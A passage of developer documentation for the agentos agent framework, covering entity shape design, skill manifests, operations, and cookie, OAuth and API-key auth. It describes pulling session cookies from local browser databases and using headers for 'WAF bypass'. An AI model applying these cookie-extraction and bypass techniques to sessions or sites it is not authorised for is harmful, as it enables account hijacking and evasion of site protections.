Don’t enforce via enum (too many values). Document the convention and let agentos test flag non-compliant values. See Testing & Validation for how to run shape validation.
11. Separate content from context (NEPOMUK principle)
A video is a file. The social engagement around it is a post. A transcript is text. The meeting it came from is the context. Don’t mix artifact properties with social properties on the same shape.
Bad: video has view_count, like_count, comment_count, posted_by (those are social context)
Good: video is a file with duration + resolution. A post contains the video and carries the engagement.
Ask: “If I downloaded this to my hard drive, which fields would still make sense?” Those are the artifact fields. Everything else is context that belongs on a wrapper entity.
12. Comments are nested posts, not a separate shape
A comment is a post that replies_to another post. A reply to a message is still a message. Don’t create separate shapes for nested versions of the same thing — use the replies_to relation to express the hierarchy.
13. Booleans describe state, relations describe lineage
is_fork: boolean tells you nothing. forked_from: repository tells you the lineage. If a boolean implies a relationship to another entity, model the relationship instead.
Bad: is_fork: boolean (from what?)
Good: forked_from: repository (the source is traversable)
14. Booleans that encode direction are really relationships
is_outgoing: boolean on a message means “I sent this.” But that information already lives in the from: account relation — if the from account is the user, it’s outgoing. Don’t duplicate relationship semantics as boolean flags.
Bad: is_outgoing: boolean on message
Good: from: account relation — direction is derived by comparing from to the current user
Same pattern: is_sent, is_received, is_mine — all derivable from a directional relation.
15. Booleans that encode cardinality are derivable
is_group: boolean on a conversation means “has more than two participants.” That’s not state — it’s a count. Don’t store what you can derive from the structure.
Bad: is_group: boolean on conversation
Good: participant: account[] relation — is_group is len(participants) > 2
Same pattern: has_attachments (derive from attachment: file[]), has_unread (derive from messages), is_empty (derive from children).
16. Source data doesn’t dictate shape
A skill’s source (API, database, scrape) returns whatever it returns. That doesn’t constrain the shape. The Python function is the transformation boundary — it takes raw source data and returns shape-native dicts.
Apple Contacts gives flat strings: Organization: Anthropic, Title: Engineer. That doesn’t mean person gets organization: string. It means the skill transforms those strings into a roles: role[] typed ref.
Bad: “The API returns platform: string, so the shape needs a platform field”
Good: “What kind of thing is this? Model it correctly. The skill transforms source data to fit.”
Design shapes for the domain, not for the source. Every skill file is a template — other agents copy the patterns they see.
17. Model life like LinkedIn, not like a spreadsheet
People have roles at organizations. Roles have titles, departments, start dates, end dates. Education is a role at a school. Membership is a role in a community. Authorship is a role on a publication.
The LinkedIn mental model: a person has a timeline of positions, each connecting them to an organization with a title and time range. This is principle #2 made concrete.
person --roles--> role[] --organization--> organization
--title: "Engineer"
--department: "Research"
--start_date: 2024-01-15
--end_date: null (current)
This applies broadly: board membership, team membership, project assignment, course enrollment. If a relationship has a time dimension or a title, it’s a role.
Review Checklist
After writing or editing a shape, ask yourself:
- Fields or relations? For each string field, ask: “Is this value itself an entity?” If yes, make it a relation.
- Currency with price? Every monetary amount has a currency companion.
- URLs audited? Is each URL the record’s own link, or does it point to another entity?
- Domain-agnostic? Would this shape make sense for a different source providing the same kind of thing?
-
alsojustified? Does thealsochain represent genuine “is-a” relationships that aid cross-type queries? - Author modeled correctly? Is the author a string (quick attribution) or a relation (traversable entity)?
- Addresses structured? Are locations/addresses relations to place, not inline strings?
- Collections owned? Do lists/playlists/shelves have a
belongs_torelation? - Roles, not fields? Are time-bounded relationships (jobs, education, membership) modeled as role relations, not person fields?
- Display makes sense? Are the right fields in title/subtitle/columns for this shape?
- Content vs context? If this is a media artifact, are social metrics on a wrapper post instead?
- Nesting via reply_to? Is a “sub-type” really just this shape with a parent relation?
- ISO standards? Are languages (ISO 639-1), countries (ISO 3166-1), currencies (ISO 4217) using standard codes?
- Booleans or relations? Does any boolean imply a relationship? (
is_fork→forked_from) - Direction booleans? Is
is_outgoing/is_sentderivable from afromrelation? - Cardinality booleans? Is
is_group/has_attachmentsderivable from counting a relation? - Source-independent? Did you design for the domain, or did the API shape leak into the schema?
- Roles modeled as LinkedIn? Are jobs/education/memberships
role[]relations with title + org + time range?
Returning shape-native data from operations
When an operation declares returns: email[], the Python function returns dicts whose keys match the shape. The shape is the contract — no separate mapping layer sits between the Python code and the engine.
# shapes/email.yaml
email:
also: [message]
fields:
from_email: string
to: string[]
cc: string[]
labels: string[]
thread_id: string
relations:
from: account
conversation: conversation
display:
title: name
subtitle: from_email
date: datePublished
# skill.yaml
operations:
get_email:
returns: email # points to the email shape
python:
module: ./gmail.py
function: get_email
# gmail.py — returns email-shaped dicts directly
def get_email(id: str, _call=None) -> dict:
return {
"id": msg_id,
"name": subject, # standard field
"text": snippet, # standard field
"url": web_url, # standard field
"published": date, # standard field
"content": body_text, # standard field (FTS)
"from_email": sender, # shape-specific field
"to": recipients, # shape-specific field
"labels": label_ids, # shape-specific field
}
The Python code does the field mapping — it transforms raw API responses into shape-native dicts. Standard fields (id, name, text, url, image, author, published, content) are available on every shape without declaring them.
Canonical fields
The renderer resolves entity display from standard fields. Every Python return should populate as many of these as the source data supports — they drive consistent previews, detail views, and search results across all skills.
| Field | Purpose |
|---|---|
name | Primary label / title |
text | Short summary or snippet for preview rows |
url | Clickable link |
image | Thumbnail / hero image |
author | Creator / brand / owner |
published | Temporal anchor |
content | Long body text (stored separately, FTS-indexed) |
Not every entity has all of these — a product may have no published, an order may have no image. Map what the source provides; skip what doesn’t apply.
Typed references (entity relationships)
To create linked entities and graph edges, return nested dicts keyed by entity type:
def get_email(id: str, _call=None) -> dict:
return {
"id": msg_id,
"name": subject,
# Single typed ref — creates: email --from--> account
"from": {
"account": {
"handle": sender_email,
"platform": "email",
"display_name": sender_name,
}
},
# Array typed ref — creates: email --to--> account (one per recipient)
"to": {
"account[]": [
{"handle": addr, "platform": "email", "display_name": name}
for addr, name in recipients
]
},
}
The outer key (from, to) becomes the edge label. The inner key (account, account[]) is the entity tag. The engine auto-creates/deduplicates the linked entity and adds the edge.
A typed ref is collapsed to null if none of its identity fields (id or name) survive — so partial data doesn’t create ghost entities.
Validation
Shape conformance is checked at two levels:
Pre-commit (static)
bin/audit-skills.py parses Python return dict literals via AST and warns if keys don’t match the declared shape. Runs automatically on every commit. Catches dict-literal returns but misses dynamic construction, helper functions, and _call composition.
Runtime
The engine validates every entity-returning skill call after execution. If the returned data contains keys not declared in the shape (fields, relations, or standard fields), a warning is logged to engine.log. Missing identity fields (id and name) also trigger warnings.
Runtime validation catches everything the static check misses — it sees the actual data. Check ~/.agentos/logs/engine.log for Shape conformance warnings after running a skill.
Both checks are advisory (warnings, not errors). They exist to surface non-conformant skills, not to block execution.
Prior Research
Extensive entity modeling research lives in /Users/joe/dev/entity-experiments/. These are not authoritative — many are outdated — but contain valuable principles and platform analysis worth consulting when designing new shapes.
Entity & Ontology Research
schema-entities.md— Core entity type definitions, OGP foundation, Joe’s hypotheses on note vs articleschema-relationships.md— Relationship type catalog and design patternsresearch/entities/open-graph-protocol.md— OGP types, why flat beats hierarchicalresearch/entities/google-structured-data.md— Schema.org structured data patterns
Platform Research
research/platforms/google-takeout.md— 72 Google products analyzed for entity types (Contacts, Calendar, Drive, Gmail, Photos, YouTube, Maps, Chrome, Pay, Play)research/platforms/facebook-graph.md— Facebook Graph API entity modelresearch/platforms/familysearch.md— GEDCOM X genealogical data model (two relationship types + qualifiers, computed derivations, source citations)
Relationship Research
research/relationships/genealogical-relationships.md— Family relationship modeling patternsresearch/relationships/relationship-modeling.md— General relationship designresearch/relationships/schema-org-relationships.md— Schema.org relationship typesresearch/relationships/ogp-relationships.md— OGP relationship patternsresearch/relationships/no-orphans-constraint.md— Why every entity needs at least one connection
Systems Research
research/systems/outcome-entity.md— Outcome/goal entity modelingresearch/context/pkm-community.md— Personal knowledge management patternsresearch/context/semantic-file-systems.md— NEPOMUK and semantic desktop research
Skill Anatomy
The short version
The current skill style is:
- Use
connections:for external service dependencies (auth, base URLs) - Use
returns:on operations to declare the shape (entity type) the operation produces - Python modules return dicts matching the shape schema directly — no mapping layer
- Use simple
snake_casetool names likesearch,read_webpage, orsend_text - Use
operations:for both entity-returning tools and local-control/action tools - Use inline
returns:schemas for non-entity or action-style tools - Validate live behavior through the direct MCP path, not just by reading YAML
Folder shape
Every skill is a folder like:
skills/
my-skill/
skill.yaml # required — executable manifest (connections, operations, …)
readme.md # recommended before ship — markdown instructions for agents (no YAML front matter)
requirements.md # recommended — scope out the API, auth model, and entities before writing YAML
my_helper.py # optional — Python helper when inline command logic gets complex
The runtime loads only skill.yaml for structure; readme.md is merged in as the instruction body (markdown only, no YAML front matter).
Start with requirements.md before writing skill YAML. Use it to scope out what endpoints or data surfaces exist, what auth model the service uses, which entities map to what, and any decisions or trade-offs. This is useful for any skill — not just reverse-engineered ones. For web skills without public APIs, it also becomes the place to log endpoint discoveries, header mysteries, and auth boundary mappings. See the Reverse Engineering section for that playbook.
Entity skill shape
Use this pattern for normal data-fetching or CRUD-ish skills.
id: my-skill
name: My Skill
description: One-line description
website: https://example.com
connections:
api:
base_url: "https://api.example.com"
auth:
type: api_key
header:
Authorization: '"Bearer " + .auth.key'
label: API Key
help_url: https://example.com/api-keys
operations:
search:
description: Search the service
returns: result[]
params:
query: { type: string, required: true }
limit: { type: integer, required: false }
python:
module: ./search.py
function: search
timeout: 30
The returns: result[] declaration points to a shape defined in shapes/result.yaml. The Python function returns a list of dicts whose keys match that shape’s fields:
def search(query: str, limit: int = 10, _call=None) -> list[dict]:
# ... API logic ...
return [
{
"id": item["url"],
"name": item["title"],
"text": item.get("summary"),
"url": item["url"],
"image": item.get("image"),
"author": item.get("author"),
"datePublished": item.get("published_at"),
}
for item in results
]
The Python code is where field mapping happens — it transforms raw API data into shape-native dicts. No separate mapping layer needed.
Local control shape
Use this pattern for command-backed skills such as terminal, browser, OS, or app control. Local skills have no connections: block — they don’t need external auth.
id: my-local-skill
name: My Local Skill
description: Control a local surface
website: https://example.com
operations:
list_status:
description: Inspect local state
returns:
ok: boolean
cwd: string
command:
binary: python3
args:
- -c
- |
import json, os
print(json.dumps({"ok": True, "cwd": os.getcwd()}))
timeout: 10
If you are starting a new skill from scratch, use npm run new-skill -- my-skill for an entity scaffold or npm run new-skill -- my-skill --local-control for a local-control scaffold.
Operations
Operations are skill tools — the things agents can call.
Entity operations
When an operation returns data that maps to an entity type, declare the shape with returns::
operations:
list_emails:
description: List emails with full content
returns: email[] # array of email entities
python:
module: ./gmail.py
function: list_emails
timeout: 120
get_email:
description: Get a specific email
returns: email # single email entity
python:
module: ./gmail.py
function: get_email
timeout: 30
returns: email[] means “this operation returns an array of records matching the email shape.” The Python function must return dicts with keys matching the shape’s fields (see Shapes for field definitions and standard fields).
Rules:
- Use
snake_case— prefer short, obvious names likesearch,read_webpage,list_tasks - Use
returns: entity[]for list/search results,returns: entityfor single entities - The Python module does the field mapping — transform raw API data into shape-native dicts
- Pass caller-provided limits through to the API when the backend supports them
- Use relative
rest.urlpaths (e.g./tasks/filter) when the connection has abase_url - Use absolute URLs only when a skill has no connection or the endpoint is on a different domain
Action operations
Use an inline returns: schema when one of these is true:
- The return value is not an entity
- The tool is an action, not a normal entity read/write
- The tool returns a custom inline schema
operations:
send_email:
description: Send a new email
returns: email # still an entity — the sent email
python:
module: ./gmail.py
function: send_email
timeout: 30
delete_label:
description: Delete a Gmail label
returns:
status: string # inline schema — not an entity
python:
module: ./gmail.py
function: delete_label
timeout: 15
Rules:
- Operation names should still be
snake_case - Prefer direct, concrete verbs like
send_text,focus_tab,list_status - Test them through
mcp:callearly, because runtime mismatches are easier to miss than YAML mismatches
Capabilities (dynamic MCP tools)
Skills can surface first-class MCP tools via provides:. Each provides: tool entry generates a top-level MCP tool (like web_search, web_read, flight_search) that agents see alongside the built-in tools. No hardcoded Rust is needed — the engine reads provides: from installed skills at startup.
Registration is skill-level. Add a provides: list entry with tool: (MCP tool name) and via: (operation name). Optional urls: declares URL patterns for routing (URL-specific providers are preferred over generic ones).
# Generic provider — always eligible
provides:
- tool: web_search
via: search
# URL-specific provider — preferred when URL matches
provides:
- tool: web_read
via: transcript_video
urls:
- "youtube.com/*"
- "youtu.be/*"
When multiple skills provide the same tool name, the engine:
- Intersects params across all providers (only common params appear on the MCP tool)
- Routes calls by: explicit
skillparam > URL pattern match > credentialed provider > no-auth fallback - Adds a note in the tool description pointing to
load()for provider-specific advanced options
Current dynamic tools (from installed skills):
web_search— brave, exaweb_read— firecrawl, exa, curl (generic); youtube, reddit (URL-specific)flight_search— serpapi
To verify dynamic tools appear:
cd ~/dev/agentos
node scripts/mcp-test.mjs stdio "./target/release/agentos mcp"
Credential and cookie providers use the same provides: list with auth: entries (see Connections & Auth).
Connections & Auth
Every skill declares its external service dependencies as named connections:. Each connection can carry base_url, auth (with a type discriminator), optional description, label, help_url, optional, and local data sources:
sqlite:— path to a SQLite file (tilde-expanded). SQL operations bind to the connection that declares the database; there is no top-leveldatabase:on the skill.vars:— non-secret config (paths, filenames) merged into the executor context (e.g.params.connection.varsfor Python) so scripts can read local files without hardcoding home-directory paths.
Local skills (no external services) simply omit the connections: block.
Common patterns
Most common — single API key connection:
connections:
api:
base_url: "https://api.example.com/v1"
auth:
type: api_key
header:
x-api-key: .auth.key
label: API Key
help_url: https://example.com/api-keys
Multi-connection — public GraphQL + authenticated web session:
connections:
graphql:
base_url: "https://api.example.com/graphql"
web:
auth:
type: cookies
domain: ".example.com"
Multi-backend — same service, different transports (e.g. SDK + CLI):
connections:
sdk:
description: "Python SDK — typed models, batch ops, biometric auth"
vars:
account_name: "my-account"
cli:
description: "CLI tool — stable JSON contract, fallback path"
vars:
binary_path: "/opt/homebrew/bin/mytool"
When connections differ by transport rather than service, each operation declares which it supports (connection: [sdk, cli]). The Python helper receives connection as a param and dispatches to the appropriate backend. Both paths normalize output into the same adapter-compatible shape. Use this when: (a) a v0 SDK needs a stable CLI fallback, (b) read ops work with both but writes need the SDK for batch/typed APIs, or (c) offline/online modes with the same data model.
Rules
base_urlon a connection is used to resolve relativerest.urlandgraphql.endpointvalues- Single-connection skills auto-infer the connection — no
connection:needed on each operation - Multi-connection skills must declare
connection:on each operation: either one name (connection: api) or a list (connection: [api, cache]) when the caller may choose the backing source (live API vs local cache, etc.) - With
connection: [a, b, …], the first entry is the default; exposeconnectioninparamsand pass it through from Python/rest/graphqlso the runtime resolves the effective connection (seeskills/granola/skill.yamlforparams.connectionwired intoargs) - Set
connection: noneon operations that should skip auth entirely - Use
optional: trueif the skill works anonymously but improves with credentials - Connections without any auth fields (just
base_url,sqlite,vars, and/ordescription) are valid — they serve as service declarations
Connection names are arbitrary. Common conventions:
api— REST API with key/token authgraphql— GraphQL/AppSync (may or may not have auth)web— cookie-authenticated website (user session)
Auth types
All auth is declared under a single auth: key with a type discriminator. Three types are supported.
api_key — API keys/tokens injected via header, query, or body templates with jaq expressions:
connections:
api:
auth:
type: api_key
header:
Authorization: '"Bearer " + .auth.key'
label: API Key
cookies — session cookies resolved from the credential store (for stored sessions) or provider skills (Brave, Firefox, Playwright):
connections:
web:
auth:
type: cookies
domain: ".claude.ai"
names: ["sessionKey"]
oauth — OAuth 2.0 token refresh and provider-based acquisition:
connections:
gmail:
auth:
type: oauth
service: google
scopes:
- https://mail.google.com/
Resolution algorithm
Cookie auth uses timestamp-based resolution — all sources are checked, and the one with the newest cookies wins. There is no fixed priority order and no TTL-based expiry.
Sources
Three sources of cookies exist, each with different freshness characteristics:
| Source | What it is | Freshness |
|---|---|---|
| In-memory cache | Cookies from the last extraction, updated by Set-Cookie responses from our own HTTP requests (writeback). Lives in engine process memory. | Can be newer than the browser — when a server rotates a session token via Set-Cookie in response to our request, the cache has the new value before the browser does. |
| Browser providers (Brave, Firefox) | Fresh extraction from the browser’s local cookie database. | Reflects the user’s latest browsing — if they just visited Amazon and got a fresh session, the browser has the newest cookies. |
Credential store (credentials.sqlite) | Persistent copy of cookies, also updated by writeback. Survives engine restart. | Same data as the cache, but persistent. Staler than the cache if writeback updated the cache since last store write. |
How it works
1. Gather candidates from ALL sources:
a. In-memory cache (instant — HashMap lookup)
b. Browser providers (~20ms — local SQLite reads)
c. Credential store (~1ms — local SQLite read)
2. Score each candidate:
- Filter expired cookies
- Build cookie header string
- Compute newest_cookie_at (latest per-cookie timestamp)
3. Pick the candidate with the highest newest_cookie_at.
On ties, the first candidate (cache) wins.
4. If winner is from cache → return immediately (identity already known)
If winner is from a provider → run account_check for identity, persist to store + cache
If winner is from store → return as-is (fallback)
5. If no candidates → error with help_url
6. On SESSION_EXPIRED or 401/403 → exclude failed provider, retry
Per-cookie timestamps
Every cookie carries a timestamp tracking when it was last set:
- Browser cookies have a
createdfield (Unix seconds with sub-second precision) from the browser’s cookie database. Brave and Firefox both provide this. - Writeback cookies (from
Set-Cookieresponses to our HTTP requests) get stamped withnow()when the engine processes the response. This is how our cache becomes newer than the browser after a server-side token rotation. - Store cookies carry a
cookie_timestampsmap in the value blob, updated on writeback viamerge_cookie_header.
The newest_cookie_at for a candidate is the maximum timestamp across all its cookies. This single number determines who wins.
Example: why timestamps matter
Call 1 (cold start — no cache):
Cache: empty
Brave: session_token created at 1712019700.5 ← winner (only candidate)
Store: empty
→ Extracts from Brave, runs account_check, persists to store + cache
Call 2 (cache populated):
Cache: session_token at 1712019700.5
Brave: session_token at 1712019700.5 (same — user hasn't browsed)
Store: session_token at 1712019700.5
→ Tie — cache wins (first candidate). No account_check needed. ~58ms.
Call 3 (server rotated token via Set-Cookie):
Cache: session_token at 1712019800.0 ← winner (writeback stamped now())
Brave: session_token at 1712019700.5
Store: session_token at 1712019800.0
→ Cache wins. The server gave US the new token; the browser doesn't have it yet.
Call 4 (user browsed Amazon, got fresh cookies):
Cache: session_token at 1712019800.0
Brave: session_token at 1712019900.3 ← winner (user's browsing is newest)
Store: session_token at 1712019800.0
→ Brave wins. Fresh extraction, account_check runs, cache + store updated.
Why no TTL?
Previous versions used a 5-minute TTL on the cache — entries older than 5 minutes were treated as stale. This was arbitrary and wrong in both directions: too aggressive when writeback kept the cache genuinely fresh, too lenient when the browser got new cookies 30 seconds later.
Timestamps replace TTL entirely. A cache entry from 10 minutes ago still wins if its cookies are genuinely newer than what the browser has. A cache entry from 1 second ago loses if the browser has fresher cookies. The timestamp is the only arbiter.
Playwright
Playwright (live browser session via CDP) is always skipped unless explicitly requested via the provider parameter. It launches a visible Chrome window — too expensive and disruptive for automatic resolution. Use it for reverse engineering and login flows, not for runtime auth.
Cookie format contract for Python
When a Python function receives .auth.cookies (via args: { cookies: .auth.cookies } in skill.yaml), the value is a cookie header string — e.g. "name1=val1; name2=val2". This is the same format as the HTTP Cookie header.
Pass it directly to agentos.http:
from agentos import http
# Simple request
resp = http.get(url, cookies=cookie_header, **http.headers(accept="json"))
# Session with cookie jar
with http.client(cookies=cookie_header) as c:
resp = c.get(url, **http.headers(waf="cf", accept="html"))
The SDK helpers get_cookies(params) and require_cookies(params, op) extract the cookie header from params.auth.cookies:
from agentos.http import require_cookies
cookie_header = require_cookies(params, "list_orders")
# Raises ValueError if no cookies available
Individual cookie values are also available as .auth.{cookie_name} — e.g. .auth.sessionKey — for operations that need specific cookies by name rather than the full header string.
Cookie domain filtering (RFC 6265)
The engine automatically filters cookies by RFC 6265 domain matching when resolving auth. If a connection declares base_url: "https://riders.uber.com", only cookies whose domain matches riders.uber.com (including parent domains like .uber.com) are included. Sibling subdomain cookies (.auth.uber.com, .www.uber.com) are filtered out. Skills don’t need to handle this — the provider does it automatically.
Cookie identity resolution
Cookie-auth skills should resolve account identity so the graph knows who the session belongs to. Two deterministic paths exist:
JSON APIs — use check.identifier and check.display on the auth block. The check block handles liveness and identity in one HTTP call using jaq expressions on the JSON response:
connections:
web:
auth:
type: cookies
domain: ".claude.ai"
names: ["sessionKey"]
check:
url: "https://claude.ai/api/organizations"
expect_status: 200
identifier: '.[] | select(.capabilities | contains(["chat"])) | .email'
display: '.[] | select(.capabilities | contains(["chat"])) | .name'
HTML services — use a Python operation with an account adapter. When the introspection endpoint returns HTML (not JSON), identity extraction belongs in Python. The skill declares an account adapter and a check_session operation that returns: account:
adapters:
account:
id: .customer_id
name: .display
issuer: .issuer
data.marketplace_id: .marketplace_id
operations:
check_session:
returns: account
connection: web
python:
module: ./my_skill.py
function: whoami
params: true
timeout: 30
The Python function parses the HTML and returns structured identity data including issuer (the service domain, e.g. "amazon.com"), customer_id (a stable account ID used as the adapter id), and display (a human-friendly name). The extraction pipeline automatically links account-tagged nodes to the primary user via Person --claims--> Account.
Include issuer in the account adapter — it’s the join key that links the graph entity to credential store rows. The adapter id field doubles as the account identifier for dedup.
Leading by example: skills/amazon/ (HTML identity via Python), skills/claude/ (JSON identity via check block).
Provider auth
Credentials can come from other installed apps (e.g. Mimestream provides Google OAuth tokens, Brave provides browser cookies).
Skill-level provides: is a typed list: each entry is either tool (capability routing) or auth (auth supply).
OAuth provider (excerpt):
provides:
- auth: oauth
service: google
via: credential_get
scopes:
- https://mail.google.com/
Cookie provider (excerpt):
provides:
- auth: cookies
via: cookie_get
description: "Cookies from Brave Browser profiles"
Consumer skills don’t name a specific provider — the runtime discovers installed providers automatically via find_auth_providers(type, scope).
Three cookie providers are available: Brave (reads SQLite cookie DB), Firefox (reads SQLite cookie DB), and Playwright (reads from persistent Chromium session via CDP). Playwright is the primary provider for cookies acquired through login automation flows.
Example references:
- OAuth consumer:
skills/gmail/skill.yaml - OAuth provider:
skills/mimestream/skill.yaml - Cookie consumer:
skills/claude/skill.yaml - Cookie provider (browser DB):
skills/brave-browser/skill.yaml - Cookie provider (automation):
skills/playwright/skill.yaml - Multi-connection:
skills/goodreads/skill.yaml(graphql + web)
Auth failure convention for Python skills
When a Python skill detects an authentication failure, it should raise an exception rather than returning an error dict. Two conventions exist, and the engine handles both:
Convention 1: SESSION_EXPIRED: prefix (preferred for cookie-auth skills)
Use SESSION_EXPIRED: when the skill can definitively detect that the session is stale — typically via login redirects, expired-session pages, or specific error responses. This is the recommended convention for cookie-authenticated skills.
def list_orders(params):
cookie_header = _require_cookies(params, "list_orders")
with _auth_client(cookie_header) as client:
resp = client.get(f"{BASE}/your-orders/orders")
body = resp.text
if _is_login_redirect(resp, body):
raise RuntimeError(
"SESSION_EXPIRED: Amazon redirected to login — session cookies are expired or invalid."
)
return _parse_orders(body)
Format: SESSION_EXPIRED: <human-readable reason>
The engine catches this prefix, excludes the current cookie provider from the candidate list, and retries with the next-best provider. This handles the common case where one browser has stale cookies but another (e.g. Playwright with a live session) has fresh ones.
Convention 2: HTTP status codes in exception message (fallback)
For API-style endpoints that return standard HTTP status codes, include 401, 403, unauthorized, or forbidden in the exception message:
def get_api_keys(cookies: str) -> dict:
resp = client.get("/api/keys")
if resp.status_code in (401, 403):
raise Exception(f"Unauthorized (HTTP {resp.status_code}): session expired")
Both conventions trigger the same retry behavior: invalidate the cookie cache, exclude the failing provider, and re-run with fresh cookies.
When to use which
| Situation | Convention |
|---|---|
| HTML scraping — login redirect detected | SESSION_EXPIRED: prefix |
| HTML scraping — auth wall / sign-in page | SESSION_EXPIRED: prefix |
| JSON API returns 401/403 | HTTP status in exception |
| Dashboard returns error JSON with “expired” | Either — SESSION_EXPIRED: is clearer |
Provider retry behavior
The engine retries once on auth failure, with the failing provider excluded:
1. Engine selects best provider (e.g. Brave, 23 cookies)
2. Skill runs, raises SESSION_EXPIRED
3. Engine excludes Brave, re-selects (e.g. Playwright, 16 cookies)
4. Skill runs again with Playwright's cookies
5. If this also fails → error surfaces to the caller (no infinite loops)
Cookie provider selection
When multiple browser cookie providers are installed (Brave, Firefox), they all
run as candidates alongside the cache and store. The winner is determined by
newest_cookie_at — the latest per-cookie timestamp across all cookies.
Within the provider tier (when comparing two browser providers against each other), the scoring heuristic breaks ties:
- Required cookie names — providers that have all cookies listed in the
connection’s
namesfield score highest - Creation timestamp — the provider whose cookies were created most recently wins
- Cookie count — final tiebreaker when all else is equal
Playwright is always skipped unless explicitly requested (see above).
Explicit provider override
When the automatic selection picks wrong (or for testing), pass provider as a
top-level argument to run():
run({ skill: "amazon", tool: "list_orders", provider: "playwright" })
This bypasses the selection heuristic entirely and uses the specified provider.
Valid provider names are the skill IDs of installed cookie providers (e.g.
"playwright", "brave-browser", "firefox").
Python Skills
Use the python: executor when a skill needs Python logic (parsing, API glue, multi-step flows). It calls a function directly in a Python module — no binary: python3 boilerplate, no sys.argv dispatch, no | tostring on every arg.
Basic shape
operations:
get_schedule:
description: Get today's class schedule
returns: class[]
params:
date: { type: string, required: false }
location_id: { type: integer, default: 6 }
python:
module: ./my_script.py
function: get_schedule
args:
date: .params.date
location_id: .params.location_id
timeout: 30
The Python function receives keyword arguments and returns shape-native data — dicts whose keys match the declared shape:
def get_schedule(date: str = None, location_id: int = 6) -> list[dict]:
# ... fetch from API ...
return [
{
"id": cls["id"],
"name": cls["title"],
"datePublished": cls["start_time"],
"text": cls["description"],
# shape-specific fields
"instructor": cls.get("coach_name"),
"capacity": cls.get("max_capacity"),
}
for cls in raw_classes
]
The function does the field mapping — it transforms raw API/service data into dicts matching the shape declared in returns:. No separate mapping layer is needed.
Rules:
moduleis resolved relative to the skill folder (use./my_script.py)functionis the function name in the moduleargsvalues are jaq expressions resolved against the params context (same asrest.body)- Shorthand: When the Python function expects a single
paramsdict, useparams: trueinstead ofargs: { params: .params } - Args are passed as typed JSON — integers stay integers, no
| tostringneeded timeoutdefaults to 30 secondsresponsemapping (root, transform) works the same asrest:andgraphql:- Auth values are available via
.auth.*in args expressions - The runtime handles I/O — just return a value from your function
Examples: gmail, claude, goodreads, granola, cursor, here-now.
Returning shape-native data
When an operation declares returns: email[], the Python function must return a list of dicts matching the email shape. Use standard fields (id, name, text, url, image, author, datePublished, content) plus any shape-specific fields.
# gmail.py — returns email-shaped dicts directly
def get_email(id: str, url: str = None, _call=None) -> dict:
# ... Gmail API logic ...
return {
"id": msg_id,
"name": subject, # standard: primary label
"text": snippet, # standard: preview text
"url": f"https://mail.google.com/...",
"datePublished": internal_date, # standard: temporal anchor
"content": body_text, # standard: long body (FTS)
# email-specific fields from shape
"from_email": sender,
"to": recipients,
"labels": label_ids,
}
For typed references (relations to other entities), return nested dicts keyed by entity type:
def get_email(id: str, _call=None) -> dict:
return {
"id": msg_id,
"name": subject,
# typed reference — creates a linked account entity
"from": {
"account": {
"handle": sender_email,
"platform": "email",
"display_name": sender_name,
}
},
}
Connection dispatch
When a skill has multiple connections that serve the same operations via different transports (SDK vs CLI, live API vs cache), the Python helper receives the active connection and dispatches accordingly:
operations:
list_items:
description: List items from the service
returns: item[]
connection: [sdk, cli]
python:
module: ./my_skill.py
function: list_items
args:
vault: .params.vault
connection: '.connection'
timeout: 60
def list_items(vault, connection=None):
if connection and connection.get("id") == "sdk":
return _list_via_sdk(vault, connection["vars"])
else:
return _list_via_cli(vault, connection.get("vars", {}))
Both code paths return the same shape-native dicts. This pattern is useful when a primary path (SDK with batch ops) needs a stable fallback (CLI with subprocess calls). See skills/granola/ for the api + cache variant of this pattern.
_call dispatch
When a Python operation needs to compose multiple API calls (e.g. list returns stubs, get returns full data), use _call to invoke sibling operations. The engine injects _call automatically when the function signature accepts it.
def list_emails(query="", limit=20, _call=None):
stubs = _call("list_email_stubs", {"query": query, "limit": limit})
return [_call("get_email", {"id": s["id"]}) for s in stubs]
The YAML wires the Python function as usual:
operations:
list_emails:
description: List emails with full content
returns: email[]
python:
module: ./gmail.py
function: list_emails
args:
query: '.params.query // ""'
limit: '.params.limit // 20'
timeout: 120
list_email_stubs:
description: "Internal: list email IDs only"
returns: email[]
rest:
url: "/messages"
method: GET
query:
maxResults: ".params.limit // 20"
q: ".params.query"
response:
transform: ".messages // []"
Rules:
_callcan only call operations in the same skill — no cross-skill calls- The engine executes each dispatched call with full credential injection (OAuth, cookies, API keys)
- Python never sees raw credentials — the engine is the only process that touches tokens
_callis synchronous and blocking — each call completes before the next starts- The same
accountcontext from the parent call is used for dispatched operations - If a function’s signature does not include
_call(or**kwargs), it is not injected — existing functions work unchanged
Leading by example: skills/gmail/gmail.py (list + hydrate pattern with _call).
Auth Flows
When a skill needs credentials from a web dashboard (API keys, session tokens), the flow is: discover with Playwright, implement with agentos.http. For steps that agentos.http can’t replay (native form POSTs, complex redirect chains), the agent uses Playwright for that step and agentos.http for everything after.
The pattern
- Discover — use the Playwright skill interactively to walk through the login/signup flow.
capture_networkreveals endpoints,cookiesshows what session cookies get set,inspectshows form structure. - Implement — write the login flow as Python +
agentos.httpin the skill’s.pyfile. Usehttp.headers()for WAF bypass and inject cookies fromparams.auth.cookiesor_callto other skills (e.g. Gmail for magic links,brave-browserfor Google session cookies). - Store — return extracted credentials via
__secrets__so the engine stores them securely. The LLM never sees raw secret values. - Test —
test-skills.cjsshould work without a running browser. If your skill needs Playwright at runtime, rethink the approach.
Dashboard connections
Skills with web dashboards declare a dashboard connection alongside their api connection:
connections:
api:
base_url: "https://api.example.com"
auth:
type: api_key
header: { x-api-key: .auth.key }
dashboard:
base_url: "https://dashboard.example.com"
auth:
type: cookies
domain: ".example.com"
login:
- sso: google
- email_link: true
All auth goes under a single auth: key with a type discriminator (api_key, cookies, oauth). The login block declares available login methods. Login operations are Python functions that execute the flow with agentos.http. See specs/auth-model.md in the engine repo for the unified auth model, and specs/sso-credential-bootstrap.md for the end-to-end bootstrap flow.
Secret-safe credential return
Login and API key extraction operations return credentials via __secrets__:
def get_api_key(*, _call=None, **params):
# ... HTTPX calls to get the key ...
return {
"__secrets__": [{
"issuer": "api.example.com",
"identifier": "user@example.com",
"item_type": "api_key",
"label": "Example API Key",
"source": "example",
"value": {"key": api_key},
"metadata": {"masked": {"key": "••••" + api_key[-4:]}}
}],
"__result__": {"status": "authenticated", "identifier": "user@example.com"}
}
The engine writes __secrets__ to the credential store, creates an account entity on the graph, and strips the secrets before the MCP response reaches the agent.
Cookie resolution chain
The engine uses timestamp-based resolution — all cookie sources are checked, and the one with the newest cookies wins. There’s no fixed priority order. See connections.md → Resolution Algorithm for the full explanation with worked examples.
Sources (all checked on every resolve):
